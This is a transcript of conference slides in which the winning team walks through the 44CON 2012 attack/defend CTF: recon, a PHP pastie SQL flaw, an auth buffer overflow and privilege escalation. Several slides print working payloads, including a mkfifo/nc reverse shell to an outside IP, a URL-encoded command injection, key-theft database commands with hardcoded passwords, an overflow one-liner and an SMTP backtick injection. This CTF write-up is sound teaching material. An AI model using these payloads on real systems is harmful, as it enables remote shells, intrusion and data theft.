Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Playing the 44CON CTF for fun and profit

44CON
November 21, 2012

Playing the 44CON CTF for fun and profit

Rundown of what it took to win the MWRLabs 44CON CTF in 2012 by the winning team 'Three Headed Monkeys'

44CON

November 21, 2012
Tweet

More Decks by 44CON

Other Decks in Technology

Transcript

  1. Me Software developer Trying not to make things worse Know

    a lot about bugs CTF team 0xbadf00d Contributor to io.smashthestack.org
  2. CTF "It's kind of like a Computer Science exam on

    acid"* * CSAW CTF "About"page Solving technical security challenges to get points.
  3. CTF Types Challenge-based DEF CON quals Ghost In The Shellcode

    CSAW CTF Attack/defend DEF CON finals 44Con CTF (this year)
  4. 44CON CTF - What we got Virtual Machine image IP

    Address Scope of "attackable" machines
  5. Attack & Defend Kind of like a pentest (maybe, I've

    never done a pentest) I have a plan: Recon Harden Write exploits Run riot Get the girl Save the world
  6. Step 1 - Recon I'd rather be offline than owned

    Self-recon Capture traffic Quick nmap of non-player servers
  7. Recon - Scoring Regular "scoring rounds" Score server stores new

    keys in services Score server checks for previous keys? Every 30 minutes Not great if you're trying to see talks!
  8. Pastie Written in PHP Pastes stored in a MySQL database

    Recon shows keys are stored as pastes PHP+MySQL - Can you tell what the vuln is yet?
  9. Pastie exploit I want keys! Had a look at my

    own DB to figure out the query
  10. Mailserver SMTP and POP3 server Keys are stored in emails

    Written in Ruby I don't know Ruby ~ 500 lines
  11. Auth - exploitation Classic stack buffer overflow Overwrite return address

    with value of my choice Remote code execution..... ....right?
  12. Auth - exploitation Just put a valid writable address in

    the buffer ptr! Easy if this was a 32bit process. Our memory space is annoying.
  13. Auth - exploitation gdb$ info proc map Mapped address spaces:

    Start Addr End Addr Size Offset objfile 0x400000 0x403000 0x3000 0x0 /services/auth/auth 0x602000 0x603000 0x1000 0x2000 /services/auth/auth 0x603000 0x604000 0x1000 0x3000 /services/auth/auth 0x604000 0x625000 0x21000 0x0 [heap] ........ ........ ....... ... ...... 0x7ffffffde000 0x7ffffffff000 0x21000 0x0 [stack] 0xffffffffff600000 0xffffffffff601000 0x1000 0x0 [vsyscall]
  14. Auth - exploitation gdb$ info proc map Mapped address spaces:

    Start Addr End Addr Size Offset objfile 0x0000000000400000 0x0000000000403000 0x3000 0x0 /services/auth/auth 0x0000000000602000 0x0000000000603000 0x1000 0x2000 /services/auth/auth 0x0000000000603000 0x0000000000604000 0x1000 0x3000 /services/auth/auth 0x0000000000604000 0x0000000000625000 0x21000 0x0 [heap] ........ ........ ....... ... ...... 0x00007ffffffde000 0x00007ffffffff000 0x21000 0x0 [stack] 0xffffffffff600000 0xffffffffff601000 0x1000 0x0 [vsyscall] (read-only)
  15. Auth - exploitation Time's up! No remote code execution :-(

    Very limited DoS Crash process Restarts automatically
  16. Servicemon - exploitation Never mind keys, I want a shell

    contestant@ubuntu:~$ nc -l 31337 -e /bin/sh nc: invalid option -- 'e'
  17. Servicemon - exploitation rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.75

    31337 >/tmp/f *cracks knuckles* http://ip:3000/hash?filelist=notafile||rm%20% 2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff% 3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh% 20-i%202>%261%7Cnc%20192.168.1.75% 2031337%20>%2Ftmp%2Ff
  18. Servicemon - exploitation contestant@ubuntu:~$ nc -lv 31337 Connection from 192.168.1.72

    port 31337 [tcp/*] accepted $ whoami contestant $ pwd /services/servicemon Now we can have some fun!
  19. Steal all the keys mysql --user=sinatra --password=44ConCTF servicemon -e "select

    status from statuses order by created_at desc limit 1;" mysql --user=pastie --password=J@cobsClub\$ paste -e "select pastie from pastie order by date desc limit 1;" OUTPUT=redis-cli -r 1 keys \* | tail -n 1 redis-cli -r 1 lrange $OUTPUT 0 1
  20. Escalation - the hard way USER PID TTY STAT COMMAND

    root 8680 ? Ss /services/auth/auth
  21. Escalation - the hard way Next time auth respawns we

    will get a root shell Lame DoS to the rescue! perl -e 'print "auth " . "A"x1100 . "\n"' | nc ip 23500 Connection from 192.168.1.73 port 31337 [tcp/*] accepted # whoami root
  22. Escalation - the easy way 220 Mail Service ready (33147)

    HELO 250 Requested mail action okay, completed EXPN respond(client, `whoami`) root